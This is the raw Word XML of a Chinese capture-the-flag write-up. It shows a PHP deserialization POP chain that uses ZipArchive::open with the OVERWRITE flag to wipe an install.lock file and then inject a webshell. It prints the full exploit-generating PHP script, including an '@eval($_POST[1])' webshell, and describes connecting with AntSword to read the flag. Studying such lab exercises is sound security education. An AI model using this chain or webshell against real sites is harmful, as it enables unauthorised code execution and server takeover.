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F56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马里奥：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" name="图片 3" descr="285afcc5a84f715be88f02f63720e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85afcc5a84f715be88f02f63720e4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89F3">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>浅析PHP原生类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76615CFF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绕过install.lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBC3669">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>要想写入Shell，必须先干掉install.lock。由于write方法可以实例化任意类并调用open方法，我们联想到PHP的原生类ZipArchive。当调用ZipArchive::open('文件名',ZipArchive::OVERWRITE)时（OVERWRITE常量值为8），如果文件存在，它会被截断（清空）或在逻辑上允许覆盖，从而绕过file_exists的逻辑检查或直接删除文件内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB10A62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构造POP链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32304B39">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>我们需要构造一个三层调用链：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A852C4">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>最外层install对象。反序列化触发wakeup，输出其username（指向Layer2）。中间层install对象。被当作字符串输出触发toString，将其username（指向Layer3）当作函数调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61056A9E">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>最内层Until对象。被当作函数调用触发invoke，执行ZipArchive::open删除锁文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAEF71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注入WebShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CB17BD">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>EXP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C1C2C5">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&lt;?php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class install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$username;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$password;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function setProps($user, $pass)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$this-&gt;username = $user;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$this-&gt;password = $pass;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class Until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$a;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$b;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$c;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$until = new Until();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>$until-&gt;a = "ZipArchive";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>$until-&gt;b = "install.lock";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>$until-&gt;c = 8;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>$payload_carrier = new install();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>$payload_carrier-&gt;setProps($until, "123");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>$payload_carrier-&gt;extra_shell = "--&gt; &lt;?php @eval(\$_POST[1]);?&gt; &lt;--";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>$trigger = new install();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>$trigger-&gt;setProps($payload_carrier, "123");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>echo urlencode(serialize($trigger));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189F0812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运行上述PHP脚本得到URL编码后的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5D90B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5.访问488ebc26.clsadp.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>?data=Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5993E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6.蚁剑连接，根目录找到flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B923E3F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3219450" cy="21748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B970">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3229610" cy="217805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Mono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erd Font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onospace">
    <w:altName w:val="JetBrainsMono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47929"/>
    <w:rsid w:val="3EA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2025-11-24T13:40:30Z</dcterms:created>
  <dc:creator>DoHoKun</dc:creator>
  <cp:lastModifiedBy>DoHoKun</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-24T14:31:40Z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eyJoZGlkIjoiYjU5OGMxYjYwNTk5ODU5NTY4Zjg5OGZiZjA0OTU4ZTciLCJ1c2VySWQiOiIyMjU2ODMxNDcifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>3C0DD750A952402F8EB547F8CDE14EE9_12</vt:lpwstr>
  </property>
</Properties>
</file>